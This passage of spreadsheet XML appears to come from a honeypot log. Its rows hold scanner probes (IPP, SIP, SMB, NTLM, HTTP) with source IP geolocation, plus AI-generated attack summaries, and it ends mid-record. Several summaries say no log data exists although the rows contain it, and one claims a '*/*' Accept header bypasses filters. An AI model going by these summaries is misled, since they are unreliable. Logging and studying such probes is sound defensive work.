  <r>
    <x v="197"/>
    <x v="197"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:12:16"/>
    <d v="2023-12-06T02:04:00"/>
    <d v="2025-04-30T10:12:16"/>
    <n v="254759"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;abuse.ch&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;34178&amp;&amp;NA&amp;&amp;37633&amp;&amp;22&amp;&amp;54526"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="ET"/>
    <s v="Ethiopia"/>
    <s v="AA"/>
    <s v="Addis Ababa"/>
    <s v="Arada"/>
    <s v="Addis Ababa"/>
    <s v="344979"/>
    <s v="NA"/>
    <s v="9.02427"/>
    <s v="38.7519"/>
    <s v="24757"/>
    <s v="EthioNet"/>
    <s v="Ethiotelecom"/>
    <s v="business"/>
    <s v="IP Pool for IPOE AD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4bd:6172"/>
    <s v="None&amp;&amp;C-I_D&amp;&amp;C-U"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No activity detected via TELNET service. _x000a_TELNET is being monitored but no malicious activity found so far. _x000a_Normal operation of the service observed."/>
    <s v="I'd need some log data to analyze, but I can provide you with common types of attacks that might be seen:_x000a__x000a_* SQL Injection_x000a_* Brute Force_x000a_* Scan Attempt_x000a_* Port Probe_x000a_* DoS Attack_x000a_* Cross Site_x000a_* Phishing Attempt"/>
  </r>
  <r>
    <x v="198"/>
    <x v="198"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:11:37"/>
    <d v="2024-12-08T03:02:53"/>
    <d v="2025-04-30T10:11:37"/>
    <n v="41"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BD"/>
    <s v="Bangladesh"/>
    <s v="C"/>
    <s v="Dhaka Division"/>
    <s v="Dhaka"/>
    <s v="Bhātāra"/>
    <s v="1209106"/>
    <s v="NA"/>
    <s v="23.8"/>
    <s v="90.45"/>
    <s v="138640"/>
    <s v="HelloTech Limited"/>
    <s v="HelloTech Limited"/>
    <s v="business"/>
    <s v="Hello Tech Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:673d:f0ae"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No malicious activity detected, log data is empty. &amp;&amp; No log data provided, so there's nothing to analyze or explain."/>
    <s v="Port Scan &amp;&amp; I need log data to analyze and provide you with the type of attacks detected. Please provide the log data, and I'll be happy to help."/>
  </r>
  <r>
    <x v="199"/>
    <x v="199"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:11:35"/>
    <d v="2024-04-02T06:32:00"/>
    <d v="2025-04-30T10:11:35"/>
    <n v="282"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SIP_H45&amp;&amp;NA&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_SMTP_H6&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMTP_H23&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_SMTP_H47&amp;&amp;SMA-LAB_POSTGRES_H10&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;143&amp;&amp;23&amp;&amp;25&amp;&amp;9100&amp;&amp;21&amp;&amp;1433&amp;&amp;5432&amp;&amp;3306&amp;&amp;443&amp;&amp;445&amp;&amp;80&amp;&amp;110&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="9465"/>
    <s v="AGOTOZ PTE. LTD."/>
    <s v="Agotoz HK Limited"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;request&amp;&amp;GET&amp;&amp;command&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 185.255.123.181:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GIOPx01      &lt;   x01   x11   x02 x02     x05x01      x04INIT   x04get        x0cNameService '}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.163;rport=52650'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '154.93.37.45:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,40696)}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,54990)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.93.37.45:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,45154)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '66.94.127.183:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'User-Agent': 'NTRIP GNSSInternetRadio', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.117.64:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=154.212.141.163;rport=53261'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Host': '38.54.116.162:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIoAAAAAAAAAAAAAAAAAAAAAA=', 'Host': '38.54.116.162:443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'HELP', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'NTLM', 'command': 'AUTH', 'data': 'TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA='}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (154.212.141.163,46358)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WRcPbNWP,)}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 94.131.97.67:9100_x000d__x000a_Accept: */*_x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9ad4:8da3"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Unknown user attempted to connect to POP3 service, indicating potential malicious login attempt to intercept or steal email credentials. _x000a_The lack of authentication details suggests the activity may be reconnaissance or probing._x000a_This could be an initial step in a larger attack or spamming campaign. &amp;&amp; No activity detected. _x000a_Empty log entry suggests that there was either no traffic or no malicious activity reported to the system._x000a_This could be due to the honeypot being newly deployed or not yet actively receiving connections. &amp;&amp; This log indicates a GET request from an unknown source with a suspicious User-Agent header, possibly indicating a scan or reconnaissance attempt. _x000a_The '*' in the Accept field is likely used to bypass filters or restrictions. _x000a_This activity may be part of a larger attack or information gathering effort. &amp;&amp; No log data provided, therefore I have nothing to analyze or explain."/>
    <s v="I'd be happy to help analyze the log data! However, I notice that there is no log data provided. Could you please provide the actual log data so I can assist you with identifying the type of attack? &amp;&amp; Port Scan &amp;&amp; Scanning Attempt"/>
  </r>
  <r>
    <x v="200"/>
    <x v="200"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:58"/>
    <d v="2024-07-09T20:15:00"/>
    <d v="2025-04-30T10:10:58"/>
    <n v="137"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MSSQL_H46"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;1433&amp;&amp;445&amp;&amp;NA&amp;&amp;55498&amp;&amp;55745"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="PE"/>
    <s v="Peru"/>
    <s v="LMA"/>
    <s v="Lima Province"/>
    <s v="Lima"/>
    <s v="Lima"/>
    <s v="3936456"/>
    <s v="15001"/>
    <s v="-12.1153"/>
    <s v="-77.0232"/>
    <s v="3132"/>
    <s v="Red Cientifica Peruana"/>
    <s v="Red Cientifica Peruana"/>
    <s v="business"/>
    <s v="Red Cientifica Peruana"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,25430)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,25596)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,4657)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24334)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24463)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,34265)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,23449)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,23522)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39641)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39689)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39132)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,39213)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24936)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,55460)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24156)}&amp;&amp;{Data_SMB:Incoming connection (161.132.55.181,24218)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a184:37b5"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze."/>
    <m/>
  </r>
  <r>
    <x v="201"/>
    <x v="201"/>
    <s v="scan-45a.shadowserver.org&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-30T10:10:54"/>
    <d v="2024-03-21T13:39:28"/>
    <d v="2025-04-30T10:10:54"/>
    <n v="617"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IPP_H38&amp;&amp;SMA-LAB_IPP_H5&amp;&amp;SMA-LAB_LDAP_H23&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_IPP_H15&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_IPP_H12&amp;&amp;SMA-LAB_SMTP_H26&amp;&amp;SMA-LAB_IPP_H23&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_LDAP_H15&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_MYSQL_H22&amp;&amp;SMA-LAB_IPP_H24&amp;&amp;SMA-LAB_IPP_H18&amp;&amp;SMA-LAB_REDIS_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_IPP_H21&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_IPP_H4&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_LDAP_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_IPP_H8&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_LDAP_H47&amp;&amp;SMA-LAB_IPP_H40&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_POSTGRES_H38&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_LDAP_H6&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_IMAP_H34&amp;&amp;SMA-LAB_REDIS_H17&amp;&amp;SMA-LAB_IMAP_H38&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_IPP_H27&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_IPP_H33&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_IPP_H37&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_IPP_H26&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SMTP_H36&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_IPP_H46&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_IPP_H22&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_IPP_H17&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_IPP_H29&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_IPP_H41&amp;&amp;SMA-LAB_POP3_H33&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_IPP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_LDAP_H33&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_HTTPS_H45&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_PJL_H30&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_IPP_H47&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_REDIS_H22&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_IPP_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MYSQL_H15"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;631&amp;&amp;389&amp;&amp;22&amp;&amp;6379&amp;&amp;25&amp;&amp;443&amp;&amp;143&amp;&amp;3306&amp;&amp;23&amp;&amp;1521&amp;&amp;80&amp;&amp;5900&amp;&amp;3389&amp;&amp;37290&amp;&amp;5432&amp;&amp;161&amp;&amp;1080&amp;&amp;9100&amp;&amp;445&amp;&amp;110&amp;&amp;8443&amp;&amp;21&amp;&amp;NA&amp;&amp;4170"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Alameda"/>
    <s v="Fremont (East Industrial)"/>
    <s v="5350734"/>
    <s v="94539"/>
    <s v="37.49"/>
    <s v="-121.931"/>
    <s v="6939"/>
    <s v="Hurricane Electric LLC"/>
    <s v="Hurricane Electric LLC"/>
    <s v="hosting"/>
    <s v="Hurricane Electric"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '156.244.8.69:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:102.0) Gecko/20100101 Goanna/6.6 Firefox/102.0 PaleMoon/33.0.0', 'method': 'GET', 'uri': '/owa/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '94.131.8.76:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://94.131.8.76:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '148', 'Content-Type': 'application/ipp', 'Host': '185.255.123.181:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.255.123.181:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '95.164.118.29:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://95.164.118.29:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '5.181.21.224:631', 'User-Agent': 'Mozilla/5.0 zgrab/0.x', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.181.21.224:631/ipp|ATTR requested-attributes 